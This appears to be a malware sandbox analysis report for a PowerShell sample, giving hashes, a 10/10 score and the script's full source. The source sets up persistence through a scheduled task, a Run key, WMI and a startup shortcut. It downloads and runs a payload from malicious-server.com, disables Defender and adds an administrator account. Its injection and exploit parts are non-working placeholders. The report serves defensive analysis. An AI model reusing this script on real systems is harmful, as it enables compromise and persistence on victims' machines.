Static task
static1
Behavioral task
behavioral1
Sample
code.ps1
Resource
win7-20240704-en
windows7-x64
9 signatures
150 seconds
Behavioral task
behavioral2
Sample
code.ps1
Resource
win10v2004-20240802-en
windows10-2004-x64
10 signatures
150 seconds
General
-
Target
code.ps1
-
Size
3KB
-
MD5
259ad591b830b483e84b4f995f35838e
-
SHA1
39be4b78a4f7d7956d21a6917f1687dc77d7847b
-
SHA256
865c27bc6fd0781cec11c4d0c0797e370a2e88f9db9f9aa25a72de7817a428fd
-
SHA512
b4eeff16b50c6b0f60fcc21a70b5a95358f8b3399fc6a08576b5e3751489462daf373be789832cefedb73fe07f959c33c499ff9f32b5e6da54f57061140c32ee
Score
10/10
Malware Config
Extracted
Language
ps1
Source
1
# Create a persistent scheduled task
2
$taskName = "MaliciousTask"
3
$taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
4
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
5
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
6
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Settings $taskSettings
7
8
# Create a registry key for persistence
9
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousRegistryEntry" -Value "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
10
11
# Download and execute a payload from a remote server
12
$payloadUrl = "http://malicious-server.com/payload.exe"
13
$downloadPath = "C:\Windows\Temp\payload.exe"
14
Invoke-WebRequest -Uri $payloadUrl -OutFile $downloadPath
15
Start-Process -FilePath $downloadPath -NoNewWindow
16
17
# Disable Windows Defender
18
Set-MpPreference -DisableRealtimeMonitoring $true
19
20
# Escalate privileges using a known vulnerability
21
$exploitCode = @"
22
[DllImport("kernel32.dll", SetLastError = true)]
23
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
24
"@
25
Add-Type -TypeDefinition $exploitCode -Language CSharp
26
[YourNamespace.YourClass]::YourExploitMethod()
27
28
# Execute a payload with elevated privileges
29
Start-Process -FilePath "C:\Path\To\ElevatedPayload.exe" -Verb runAs
30
31
# Inject malicious code into a legitimate process
32
$process = Get-Process -Name "explorer"
33
$pid = $process.Id
34
$shellcode = [System.Convert]::FromBase64String("YourEncodedShellcodeHere")
35
$ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($shellcode.Length)
36
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $ptr, $shellcode.Length)
37
$remoteThread = [System.Diagnostics.Process]::GetProcessById($pid).Threads[0].Id
38
[System.Diagnostics.Process]::GetProcessById($pid).Threads[0].Inject($ptr)
39
40
# Add a persistence mechanism via WMI
41
Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments @{ Name = "WMITrigger"; Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'"; QueryLanguage = "WQL"; EventNamespace = "root\cimv2" }
42
Set-WmiInstance -Namespace "root\subscription" -Class "ActiveScriptEventConsumer" -Arguments @{ Name = "MaliciousConsumer"; ScriptingEngine = "VBScript"; ScriptText = "ExecutePayload()" }
43
44
# Create a new user and add to the administrators group
45
net user MaliciousUser P@ssw0rd /add
46
net localgroup administrators MaliciousUser /add
47
48
# Ensure the script runs on reboot
49
$startUpPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\malicious.lnk"
50
$wScript = New-Object -ComObject WScript.Shell
51
$shortCut = $wScript.CreateShortcut($startUpPath)
52
$shortCut.TargetPath = "powershell.exe"
53
$shortCut.Arguments = "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
54
$shortCut.Save()
55
56
# Trigger an exploit within the system
57
$exploitScript = "exploit.ps1"
58
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($exploitScript))
59
Invoke-Expression $([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand)))
60
URLs
exe.dropper
http://malicious-server.com/payload.exe
Signatures
Files
-
code.ps1.ps1